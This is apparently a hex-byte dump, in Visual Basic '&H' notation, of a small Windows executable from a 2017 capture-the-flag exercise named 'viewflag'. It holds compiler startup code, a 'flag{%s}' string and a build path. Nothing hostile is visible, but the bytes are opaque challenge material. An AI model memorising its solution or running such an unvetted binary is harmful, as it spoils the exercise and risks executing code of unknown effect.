H68&amp;H33&amp;H40&amp;H00&amp;HA3&amp;H78&amp;H33&amp;H40&amp;H00&amp;HA3&amp;H7C&amp;H33&amp;H40&amp;H00&amp;HA1&amp;H68&amp;H20&amp;H40&amp;H00&amp;H89&amp;H08&amp;HA1&amp;H6C&amp;H20&amp;H40&amp;H00&amp;H8B&amp;H0D&amp;H64&amp;H33&amp;H40&amp;H00&amp;H89&amp;H08&amp;HE8&amp;H53&amp;H02&amp;H00&amp;H00&amp;HE8&amp;HAC&amp;H04&amp;H00&amp;H00&amp;H83&amp;H3D&amp;H14&amp;H30&amp;H40&amp;H00&amp;H00&amp;H75&amp;H0C&amp;H68&amp;HD6&amp;H17&amp;H40&amp;H00&amp;HFF&amp;H15&amp;H70&amp;H20&amp;H40&amp;H00&amp;H59&amp;HE8&amp;H6A&amp;H04&amp;H00&amp;H00&amp;H83&amp;H3D&amp;H10&amp;H30&amp;H40&amp;H00&amp;HFF&amp;H75&amp;H09&amp;H6A&amp;HFF&amp;HFF&amp;H15&amp;H74&amp;H20&amp;H40&amp;H00&amp;H59&amp;H33&amp;HC0&amp;HC3&amp;HE8&amp;H7B&amp;H04&amp;H00&amp;H00&amp;HE9&amp;HB3&amp;HFD&amp;HFF&amp;HFF&amp;H8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;H81&amp;HEC&amp;H28&amp;H03&amp;H00&amp;H00&amp;HA3&amp;H40&amp;H31&amp;H40&amp;H00&amp;H89&amp;H0D&amp;H3C&amp;H31&amp;H40&amp;H00&amp;H89&amp;H15&amp;H38&amp;H31&amp;H40&amp;H00&amp;H89&amp;H1D&amp;H34&amp;H31&amp;H40&amp;H00&amp;H89&amp;H35&amp;H30&amp;H31&amp;H40&amp;H00&amp;H89&amp;H3D&amp;H2C&amp;H31&amp;H40&amp;H00&amp;H66&amp;H8C&amp;H15&amp;H58&amp;H31&amp;H40&amp;H00&amp;H66&amp;H8C&amp;H0D&amp;H4C&amp;H31&amp;H40&amp;H00&amp;H66&amp;H8C&amp;H1D&amp;H28&amp;H31&amp;H40&amp;H00&amp;H66&amp;H8C&amp;H05&amp;H24&amp;H31&amp;H40&amp;H00&amp;H66&amp;H8C&amp;H25&amp;H20&amp;H31&amp;H40&amp;H00&amp;H66&amp;H8C&amp;H2D&amp;H1C&amp;H31&amp;H40&amp;H00&amp;H9C&amp;H8F&amp;H05&amp;H50&amp;H31&amp;H40&amp;H00&amp;H8B&amp;H45&amp;H00&amp;HA3&amp;H44&amp;H31&amp;H40&amp;H00&amp;H8B&amp;H45&amp;H04&amp;HA3&amp;H48&amp;H31&amp;H40
&amp;H00&amp;H8D&amp;H45&amp;H08&amp;HA3&amp;H54&amp;H31&amp;H40&amp;H00&amp;H8B&amp;H85&amp;HE0&amp;HFC&amp;HFF&amp;HFF&amp;HC7&amp;H05&amp;H90&amp;H30&amp;H40&amp;H00&amp;H01&amp;H00&amp;H01&amp;H00&amp;HA1&amp;H48&amp;H31&amp;H40&amp;H00&amp;HA3&amp;H44&amp;H30&amp;H40&amp;H00&amp;HC7&amp;H05&amp;H38&amp;H30&amp;H40&amp;H00&amp;H09&amp;H04&amp;H00&amp;HC0&amp;HC7&amp;H05&amp;H3C&amp;H30&amp;H40&amp;H00&amp;H01&amp;H00&amp;H00&amp;H00&amp;HA1&amp;H00&amp;H30&amp;H40&amp;H00&amp;H89&amp;H85&amp;HD8&amp;HFC&amp;HFF&amp;HFF&amp;HA1&amp;H04&amp;H30&amp;H40&amp;H00&amp;H89&amp;H85&amp;HDC&amp;HFC&amp;HFF&amp;HFF&amp;HFF&amp;H15&amp;H14&amp;H20&amp;H40&amp;H00&amp;HA3&amp;H88&amp;H30&amp;H40&amp;H00&amp;H6A&amp;H01&amp;HE8&amp;H44&amp;H04&amp;H00&amp;H00&amp;H59&amp;H6A&amp;H00&amp;HFF&amp;H15&amp;H18&amp;H20&amp;H40&amp;H00&amp;H68&amp;HEC&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H15&amp;H1C&amp;H20&amp;H40&amp;H00&amp;H83&amp;H3D&amp;H88&amp;H30&amp;H40&amp;H00&amp;H00&amp;H75&amp;H08&amp;H6A&amp;H01&amp;HE8&amp;H20&amp;H04&amp;H00&amp;H00&amp;H59&amp;H68&amp;H09&amp;H04&amp;H00&amp;HC0&amp;HFF&amp;H15&amp;H20&amp;H20&amp;H40&amp;H00&amp;H50&amp;HFF&amp;H15&amp;H24&amp;H20&amp;H40&amp;H00&amp;HC9&amp;HC3&amp;H8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;H8B&amp;H45&amp;H08&amp;H8B&amp;H00&amp;H81&amp;H38&amp;H63&amp;H73&amp;H6D&amp;HE0&amp;H75&amp;H2A&amp;H83&amp;H78&amp;H10&amp;H03&amp;H75&amp;H24&amp;H8B&amp;H40&amp;H14&amp;H3D&amp;H20&amp;H05&amp;H93&amp;H19&amp;H74&amp;H15&amp;H3D&amp;H21&amp;H05&amp;H93&amp;H19&amp;H74&amp;H0E&amp;H3D&amp;H22&amp;H05&amp;H93&amp;H19&amp;H74&amp;H07&amp;H3D&amp;H00&amp;H40&amp;H99&amp;H01&amp;H75&amp;H05&amp;HE8&amp;HD5&amp;H03&amp;H00&amp;H00&amp;H33&amp;HC0&amp;H5D&amp;HC2&amp;H04&amp;H00&amp;H68&amp;H69&amp;H14&amp;H40&amp;H00&amp;HFF&amp;H15&amp;H18&amp;H20&amp;H40&amp;H00&amp;H33&amp;HC0&amp;HC3&amp;HCC&amp;HFF&amp;H25&amp;H98&amp;H20&amp;H40&amp;H00&amp;H6A&amp;H14&amp;H68&amp;H28&amp;H22&amp;H40&amp;H00&amp;HE8&amp;H64&amp;H02&amp;H00&amp;H00&amp;HFF&amp;H35&amp;H7C&amp;H33&amp;H4
0&amp;H00&amp;H8B&amp;H35&amp;H10&amp;H20&amp;H40&amp;H00&amp;HFF&amp;HD6&amp;H89&amp;H45&amp;HE4&amp;H83&amp;HF8&amp;HFF&amp;H75&amp;H0C&amp;HFF&amp;H75&amp;H08&amp;HFF&amp;H15&amp;H54&amp;H20&amp;H40&amp;H00&amp;H59&amp;HEB&amp;H64&amp;H6A&amp;H08&amp;HE8&amp;H97&amp;H03&amp;H00&amp;H00&amp;H59&amp;H83&amp;H65&amp;HFC&amp;H00&amp;HFF&amp;H35&amp;H7C&amp;H33&amp;H40&amp;H00&amp;HFF&amp;HD6&amp;H89&amp;H45&amp;HE4&amp;HFF&amp;H35&amp;H78&amp;H33&amp;H40&amp;H00&amp;HFF&amp;HD6&amp;H89&amp;H45&amp;HE0&amp;H8D&amp;H45&amp;HE0&amp;H50&amp;H8D&amp;H45&amp;HE4&amp;H50&amp;HFF&amp;H75&amp;H08&amp;H8B&amp;H35&amp;H28&amp;H20&amp;H40&amp;H00&amp;HFF&amp;HD6&amp;H50&amp;HE8&amp;H5D&amp;H03&amp;H00&amp;H00&amp;H83&amp;HC4&amp;H0C&amp;H89&amp;H45&amp;HDC&amp;HFF&amp;H75&amp;HE4&amp;HFF&amp;HD6&amp;HA3&amp;H7C&amp;H33&amp;H40&amp;H00&amp;HFF&amp;H75&amp;HE0&amp;HFF&amp;HD6&amp;HA3&amp;H78&amp;H33&amp;H40&amp;H00&amp;HC7&amp;H45&amp;HFC&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;HE8&amp;H09&amp;H00&amp;H00&amp;H00&amp;H8B&amp;H45&amp;HDC&amp;HE8&amp;H1E&amp;H02&amp;H00&amp;H00&amp;HC3&amp;H6A&amp;H08&amp;HE8&amp;H21&amp;H03&amp;H00&amp;H00&amp;H59&amp;HC3&amp;H8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;HFF&amp;H75&amp;H08&amp;HE8&amp;H52&amp;HFF&amp;HFF&amp;HFF&amp;HF7&amp;HD8&amp;H1B&amp;HC0&amp;HF7&amp;HD8&amp;H59&amp;H48&amp;H5D&amp;HC3&amp;H8B&amp;HFF&amp;H56&amp;HB8&amp;HF8&amp;H21&amp;H40&amp;H00&amp;HBE&amp;HF8&amp;H21&amp;H40&amp;H00&amp;H57&amp;H8B&amp;HF8&amp;H3B&amp;HC6&amp;H73&amp;H0F&amp;H8B&amp;H07&amp;H85&amp;HC0&amp;H74&amp;H02&amp;HFF&amp;HD0&amp;H83&amp;HC7&amp;H04&amp;H3B&amp;HFE&amp;H72&amp;HF1&amp;H5F&amp;H5E&amp;HC3&amp;H8B&amp;HFF&amp;H56&amp;HB8&amp;H00&amp;H22&amp;H40&amp;H00&amp;HBE&amp;H00&amp;H22&amp;H40&amp;H00&amp;H57&amp;H8B&amp;HF8&amp;H3B&amp;HC6&amp;H73&amp;H0F&amp;H8B&amp;H07&amp;H85&amp;HC0&amp;H74&amp;H02&amp;HFF&amp;HD0&amp;H83&amp;HC7&amp;H04&amp;H3B&amp;HFE&amp;H72&amp;HF1&amp;H5F&amp;H5E&amp;HC3&amp;HFF&amp;H25&amp;H88&amp;H20&amp;H40&amp;H00&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;H
8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;H8B&amp;H4D&amp;H08&amp;HB8&amp;H4D&amp;H5A&amp;H00&amp;H00&amp;H66&amp;H39&amp;H01&amp;H74&amp;H04&amp;H33&amp;HC0&amp;H5D&amp;HC3&amp;H8B&amp;H41&amp;H3C&amp;H03&amp;HC1&amp;H81&amp;H38&amp;H50&amp;H45&amp;H00&amp;H00&amp;H75&amp;HEF&amp;H33&amp;HD2&amp;HB9&amp;H0B&amp;H01&amp;H00&amp;H00&amp;H66&amp;H39&amp;H48&amp;H18&amp;H0F&amp;H94&amp;HC2&amp;H8B&amp;HC2&amp;H5D&amp;HC3&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;H8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;H8B&amp;H45&amp;H08&amp;H8B&amp;H48&amp;H3C&amp;H03&amp;HC8&amp;H0F&amp;HB7&amp;H41&amp;H14&amp;H53&amp;H56&amp;H0F&amp;HB7&amp;H71&amp;H06&amp;H33&amp;HD2&amp;H57&amp;H8D&amp;H44&amp;H08&amp;H18&amp;H85&amp;HF6&amp;H74&amp;H1B&amp;H8B&amp;H7D&amp;H0C&amp;H8B&amp;H48&amp;H0C&amp;H3B&amp;HF9&amp;H72&amp;H09&amp;H8B&amp;H58&amp;H08&amp;H03&amp;HD9&amp;H3B&amp;HFB&amp;H72&amp;H0A&amp;H42&amp;H83&amp;HC0&amp;H28&amp;H3B&amp;HD6&amp;H72&amp;HE8&amp;H33&amp;HC0&amp;H5F&amp;H5E&amp;H5B&amp;H5D&amp;HC3&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;H8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;H6A&amp;HFE&amp;H68&amp;H48&amp;H22&amp;H40&amp;H00&amp;H68&amp;H89&amp;H17&amp;H40&amp;H00&amp;H64&amp;HA1&amp;H00&amp;H00&amp;H00&amp;H00&amp;H50&amp;H83&amp;HEC&amp;H08&amp;H53&amp;H56&amp;H57&amp;HA1&amp;H00&amp;H30&amp;H40&amp;H00&amp;H31&amp;H45&amp;HF8&amp;H33&amp;HC5&amp;H50&amp;H8D&amp;H45&amp;HF0&amp;H64&amp;HA3&amp;H00&amp;H00&amp;H00&amp;H00&amp;H89&amp;H65&amp;HE8&amp;HC7&amp;H45&amp;HFC&amp;H00&amp;H00&amp;H00&amp;H00&amp;H68&amp;H00&amp;H00&amp;H40&amp;H00&amp;HE8&amp;H2A&amp;HFF&amp;HFF&amp;HFF&amp;H83&amp;HC4&amp;H04&amp;H85&amp;HC0&amp;H74&amp;H54&amp;H8B&amp;H45&amp;H08&amp;H2D&amp;H00&amp;H00&amp;H40&amp;H00&amp;H50&amp;H68&amp;H00&amp;H00&amp;H40&amp;H00&amp;HE8&amp;H50&amp;HFF&amp;HFF&amp;HFF&amp;H83&amp;HC4&amp;H08&amp;H85&amp;HC0&amp;H74&amp;H3A&amp;H8B&amp;H40&amp;H24&amp;HC1&amp;HE8&amp;H1F&amp;HF7&amp;HD0&amp;H83&amp;
HE0&amp;H01&amp;HC7&amp;H45&amp;HFC&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H8B&amp;H4D&amp;HF0&amp;H64&amp;H89&amp;H0D&amp;H00&amp;H00&amp;H00&amp;H00&amp;H59&amp;H5F&amp;H5E&amp;H5B&amp;H8B&amp;HE5&amp;H5D&amp;HC3&amp;H8B&amp;H45&amp;HEC&amp;H8B&amp;H08&amp;H33&amp;HD2&amp;H81&amp;H39&amp;H05&amp;H00&amp;H00&amp;HC0&amp;H0F&amp;H94&amp;HC2&amp;H8B&amp;HC2&amp;HC3&amp;H8B&amp;H65&amp;HE8&amp;HC7&amp;H45&amp;HFC&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H33&amp;HC0&amp;H8B&amp;H4D&amp;HF0&amp;H64&amp;H89&amp;H0D&amp;H00&amp;H00&amp;H00&amp;H00&amp;H59&amp;H5F&amp;H5E&amp;H5B&amp;H8B&amp;HE5&amp;H5D&amp;HC3&amp;HFF&amp;H25&amp;H7C&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;H78&amp;H20&amp;H40&amp;H00&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;HCC&amp;H68&amp;H89&amp;H17&amp;H40&amp;H00&amp;H64&amp;HFF&amp;H35&amp;H00&amp;H00&amp;H00&amp;H00&amp;H8B&amp;H44&amp;H24&amp;H10&amp;H89&amp;H6C&amp;H24&amp;H10&amp;H8D&amp;H6C&amp;H24&amp;H10&amp;H2B&amp;HE0&amp;H53&amp;H56&amp;H57&amp;HA1&amp;H00&amp;H30&amp;H40&amp;H00&amp;H31&amp;H45&amp;HFC&amp;H33&amp;HC5&amp;H50&amp;H89&amp;H65&amp;HE8&amp;HFF&amp;H75&amp;HF8&amp;H8B&amp;H45&amp;HFC&amp;HC7&amp;H45&amp;HFC&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H89&amp;H45&amp;HF8&amp;H8D&amp;H45&amp;HF0&amp;H64&amp;HA3&amp;H00&amp;H00&amp;H00&amp;H00&amp;HC3&amp;H8B&amp;H4D&amp;HF0&amp;H64&amp;H89&amp;H0D&amp;H00&amp;H00&amp;H00&amp;H00&amp;H59&amp;H5F&amp;H5F&amp;H5E&amp;H5B&amp;H8B&amp;HE5&amp;H5D&amp;H51&amp;HC3&amp;H8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;HFF&amp;H75&amp;H14&amp;HFF&amp;H75&amp;H10&amp;HFF&amp;H75&amp;H0C&amp;HFF&amp;H75&amp;H08&amp;H68&amp;HBC&amp;H10&amp;H40&amp;H00&amp;H68&amp;H00&amp;H30&amp;H40&amp;H00&amp;HE8&amp;HE9&amp;H00&amp;H00&amp;H00&amp;H83&amp;HC4&amp;H18&amp;H5D&amp;HC3&amp;H8B&amp;HFF&amp;H56&amp;H68&amp;H00&amp;H00&amp;H03&amp;H00&amp;H68&amp;H00&amp;H00&amp;H01&amp;H00&amp;H33&amp;HF6&amp;H56&amp;HE8&amp;HDB&amp;H00&amp;H00&amp;H00&amp;H83&amp;HC4&amp;H0C&amp;H85&amp;HC0&amp;H74&amp;H0A&amp;H56&amp;H56&amp;H56&amp;H56&amp;H56&amp;HE8
&amp;HC4&amp;H00&amp;H00&amp;H00&amp;H5E&amp;HC3&amp;H33&amp;HC0&amp;HC3&amp;H8B&amp;HFF&amp;H55&amp;H8B&amp;HEC&amp;H83&amp;HEC&amp;H10&amp;HA1&amp;H00&amp;H30&amp;H40&amp;H00&amp;H83&amp;H65&amp;HF8&amp;H00&amp;H83&amp;H65&amp;HFC&amp;H00&amp;H53&amp;H57&amp;HBF&amp;H4E&amp;HE6&amp;H40&amp;HBB&amp;HBB&amp;H00&amp;H00&amp;HFF&amp;HFF&amp;H3B&amp;HC7&amp;H74&amp;H0D&amp;H85&amp;HC3&amp;H74&amp;H09&amp;HF7&amp;HD0&amp;HA3&amp;H04&amp;H30&amp;H40&amp;H00&amp;HEB&amp;H65&amp;H56&amp;H8D&amp;H45&amp;HF8&amp;H50&amp;HFF&amp;H15&amp;H3C&amp;H20&amp;H40&amp;H00&amp;H8B&amp;H75&amp;HFC&amp;H33&amp;H75&amp;HF8&amp;HFF&amp;H15&amp;H00&amp;H20&amp;H40&amp;H00&amp;H33&amp;HF0&amp;HFF&amp;H15&amp;H04&amp;H20&amp;H40&amp;H00&amp;H33&amp;HF0&amp;HFF&amp;H15&amp;H08&amp;H20&amp;H40&amp;H00&amp;H33&amp;HF0&amp;H8D&amp;H45&amp;HF0&amp;H50&amp;HFF&amp;H15&amp;H0C&amp;H20&amp;H40&amp;H00&amp;H8B&amp;H45&amp;HF4&amp;H33&amp;H45&amp;HF0&amp;H33&amp;HF0&amp;H3B&amp;HF7&amp;H75&amp;H07&amp;HBE&amp;H4F&amp;HE6&amp;H40&amp;HBB&amp;HEB&amp;H10&amp;H85&amp;HF3&amp;H75&amp;H0C&amp;H8B&amp;HC6&amp;H0D&amp;H11&amp;H47&amp;H00&amp;H00&amp;HC1&amp;HE0&amp;H10&amp;H0B&amp;HF0&amp;H89&amp;H35&amp;H00&amp;H30&amp;H40&amp;H00&amp;HF7&amp;HD6&amp;H89&amp;H35&amp;H04&amp;H30&amp;H40&amp;H00&amp;H5E&amp;H5F&amp;H5B&amp;HC9&amp;HC3&amp;HFF&amp;H25&amp;H50&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;H44&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;H48&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;H4C&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;HA0&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;H58&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;H5C&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;H60&amp;H20&amp;H40&amp;H00&amp;HFF&amp;H25&amp;HA8&amp;H20&amp;H40&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H0
0&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H
00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HE8&amp;H25&amp;H00&amp;H00&amp;HD2&amp;H25&amp;H00&amp;H00&amp;HC2&amp;H25&amp;H00&amp;H00&amp;HA8&amp;H25&amp;H00&amp;H00&amp;H98&amp;H25&amp;H00&amp;H00&amp;H84&amp;H25&amp;H00&amp;H00&amp;H66&amp;H25&amp;H00&amp;H00&amp;H4A&amp;H25&amp;H00&amp;H00&amp;H36&amp;H25&amp;H00&amp;H00&amp;H22&amp;H25&amp;H00&amp;H00&amp;H12&amp;H25&amp;H00&amp;H00&amp;HFC&amp;H24&amp;H00&amp;H00&amp;HDE&amp;H24&amp;H00&amp;H00&amp;HD6&amp;H24&amp;H00&amp;H00&amp;HC0&amp;H24&amp;H00&amp;H00&amp;HFE&amp;H25&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H46&amp;H24&amp;H00&amp;H00&amp;H5A&amp;H24&amp;H00&amp;H00&amp;H64&amp;H24&amp;H00&amp;H00&amp;H30&amp;H24&amp;H00&amp;H00&amp;H7A&amp;H24&amp;H00&amp;H00&amp;H84&amp;H24&amp;H00&amp;H00&amp;H9E&amp;H24&amp;H00&amp;H00&amp;HB0&amp;H24&amp;H00&amp;H00&amp;H1E&amp;H24&amp;H00&amp;H00&amp;H14&amp;H24&amp;H00&amp;H00&amp;H08&amp;H24&amp;H00&amp;H00&amp;HF4&amp;H23&amp;H00&amp;H00&amp;HDE&amp;H23&amp;H00&amp;H00&amp;HD0&amp;H23&amp;H00&amp;H00&amp;HC4&amp;H23&amp;H00&amp;H00&amp;HB8&amp;H23&amp;H00&amp;H00&amp;HB0&amp;H23&amp;H00&amp;H00&amp;HA2&amp;H23&amp;H00&amp;H00&amp;H9A&amp;H23&amp;H00&amp;H00&amp;H90&amp;H23&amp;H00&amp;H00&amp;H80&amp;H23&amp;H00&amp;H00&amp;H72&amp;H23&amp;H00&amp;H00&amp;H5A&amp;H23&amp;H00&amp;H00&amp;H72&amp;H24&amp;H00&amp;H00&amp;H50&amp;H23&amp;H00&amp;H00&amp;H26&amp;H26&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HCB&amp;H10&amp;H40&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H9F&amp;H12&amp;H40&amp;H00&amp;HAB&amp;H14&amp;H40&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;
H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H11&amp;HE5&amp;HD1&amp;H59&amp;H00&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H5F&amp;H00&amp;H00&amp;H00&amp;H88&amp;H21&amp;H00&amp;H00&amp;H88&amp;H0F&amp;H00&amp;H00&amp;H38&amp;H30&amp;H40&amp;H00&amp;H90&amp;H30&amp;H40&amp;H00&amp;H61&amp;H62&amp;H63&amp;H64&amp;H65&amp;H66&amp;H67&amp;H68&amp;H69&amp;H6A&amp;H6B&amp;H6C&amp;H6D&amp;H6E&amp;H6F&amp;H70&amp;H71&amp;H72&amp;H73&amp;H74&amp;H75&amp;H76&amp;H77&amp;H78&amp;H79&amp;H7A&amp;H41&amp;H42&amp;H43&amp;H44&amp;H45&amp;H46&amp;H47&amp;H48&amp;H49&amp;H4A&amp;H4B&amp;H4C&amp;H4D&amp;H4E&amp;H4F&amp;H50&amp;H51&amp;H52&amp;H53&amp;H54&amp;H55&amp;H56&amp;H57&amp;H58&amp;H59&amp;H5A&amp;H30&amp;H31&amp;H32&amp;H33&amp;H34&amp;H35&amp;H36&amp;H37&amp;H38&amp;H39&amp;H00&amp;H00&amp;H66&amp;H6C&amp;H61&amp;H67&amp;H7B&amp;H25&amp;H73&amp;H7D&amp;H00&amp;H00&amp;H00&amp;H00&amp;H48&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H30&amp;H40&amp;H00&amp;HF0&amp;H21&amp;H40&amp;H00&amp;H01&amp;H00&amp;H00&amp;H00&amp;H52&amp;H53&amp;H44&amp;H53&amp;HE8&amp;HBF&amp;H4B&amp;H75&amp;H8B&amp;HAE&amp;H19&amp;H4C&amp;HAA&amp;H93&amp;HCD&amp;H1C&amp;HAE&amp;H13&amp;HF7&amp;HC7&amp;H01&amp;H00&amp;H00&amp;H00&amp;H43
&amp;H3A&amp;H5C&amp;H55&amp;H73&amp;H65&amp;H72&amp;H73&amp;H5C&amp;H64&amp;H69&amp;H67&amp;H69&amp;H64&amp;H5C&amp;H44&amp;H65&amp;H73&amp;H6B&amp;H74&amp;H6F&amp;H70&amp;H5C&amp;H4E&amp;H53&amp;H53&amp;H43&amp;H32&amp;H30&amp;H31&amp;H37&amp;H5C&amp;H70&amp;H72&amp;H6F&amp;H67&amp;H72&amp;H61&amp;H6D&amp;H73&amp;H5C&amp;H4E&amp;H53&amp;H53&amp;H43&amp;H32&amp;H30&amp;H31&amp;H37&amp;H5C&amp;H52&amp;H65&amp;H6C&amp;H65&amp;H61&amp;H73&amp;H65&amp;H5C&amp;H76&amp;H69&amp;H65&amp;H77&amp;H66&amp;H6C&amp;H61&amp;H67&amp;H2E&amp;H70&amp;H64&amp;H62&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H89&amp;H17&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;H00&amp;H00&amp;HD0&amp;HFF&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H4F&amp;H12&amp;H40&amp;H00&amp;H63&amp;H12&amp;H40&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;H00&amp;H00&amp;HCC&amp;HFF&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H00&amp;H00&amp;H00&amp;H00&amp;H58&amp;H15&amp;H40&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFE&amp;HFF&amp;HFF&amp;HFF&amp;H